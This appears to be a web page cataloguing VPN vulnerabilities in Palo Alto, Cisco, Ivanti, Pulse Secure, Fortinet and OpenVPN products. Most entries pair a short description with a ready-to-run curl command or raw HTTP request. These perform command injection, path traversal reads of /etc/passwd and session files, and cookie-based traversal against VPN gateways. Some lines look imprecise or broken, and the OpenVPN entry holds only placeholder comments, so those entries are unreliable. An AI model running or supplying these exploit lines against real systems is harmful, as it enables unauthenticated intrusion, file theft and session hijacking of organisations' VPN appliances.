Comprehensive database of VPN-related vulnerabilities and exploits
Command injection vulnerability in Palo Alto Networks GlobalProtect gateways that allows unauthenticated remote code execution on the VPN appliance.
curl -k 'https://target/global-protect/getconfig.esp' -d 'user=admin;id;' -H 'Content-Type: application/x-www-form-urlencoded'Local privilege escalation vulnerability in Cisco AnyConnect Secure Mobility Client that allows authenticated local users to elevate privileges to SYSTEM.
python3 anyconnect_privesc.py --target localhost --payload cmd.exeAuthentication bypass vulnerability in Ivanti Connect Secure and Policy Secure gateways that allows unauthenticated access to restricted resources.
curl -k 'https://target/api/v1/totp/user-backup-code/../../../../../../etc/passwd' -H 'Authorization: 'An unauthenticated remote code execution vulnerability in Pulse Connect Secure that allows attackers to execute arbitrary code on the VPN appliance.
curl -k 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' -H 'Cookie: DSID=../../../../../../../tmp/sess_[SESSION_ID]'An improper limitation of a pathname to a restricted directory vulnerability in Fortinet FortiOS allows attackers to download system files via specially crafted HTTP resource requests.
curl -k 'https://target/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'An OS command injection vulnerability in Palo Alto Networks PAN-OS allows for remote code execution in PAN-OS 8.1 versions earlier than 8.1.15.
POST /esp/cms_changeDeviceContext.esp HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
deviceType=';id;'A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD) could allow an unauthenticated, remote attacker to conduct directory traversal attacks.
curl -k --path-as-is https://target/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../OpenVPN versions before 2.4.4 and 2.3.18 are vulnerable to a buffer overflow vulnerability when key-method 1 is used, potentially leading to code execution.
# Exploit requires crafted key-method 1 configuration
# Details available in security advisoryIn Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability.
curl -k 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/'